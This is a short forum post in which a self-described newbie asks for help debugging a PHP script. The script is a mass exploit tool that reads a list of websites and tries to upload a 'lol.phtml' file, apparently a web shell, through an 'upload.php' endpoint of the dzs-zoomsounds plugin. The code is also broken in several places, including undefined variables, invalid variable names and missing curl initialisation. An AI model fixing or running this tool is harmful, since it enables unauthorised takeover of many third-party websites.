anyone can help my coding newbie 😃
i have problem with my code
it's
[ATTACH]5219[/ATTACH]
<?php
error_reporting(0);
set_time_limit(0);
$likuliku="lol.phtml";
if(!file_exists($jembut[1]))
{
echo "\n\t usage : php $jembut[0] tusbol.txt \n";
}
$get=file_get_contents($jembut[1]);
$ex=explode("\r\n",$get);
echo "\tsebarataan website luad:".count($ex)."\n\n";
foreach ($ex as $urls){
echo "[+] Bacacari : $urls \n";
$g=@file_get_contents($urls);
if(eregi("/*/s/",$g)){
echo "[+] Some Found testing ..\n";
$dzs-zoomsounds=($urls).("/***//**/***/upload.php");
curl_setopt($urls, CURLOPT_POST, true);
curl_setopt($urls, CURLOPT_POSTFIELDS,
array('file_field'=>"@$likuliku"));
curl_setopt($urls, CURLOPT_RETURNTRANSFER, 1);
$postResult= curl_exec($urls); curl_close($urls);
echo "$postResult";
?>
please help me for newbie coder 😢
eror.png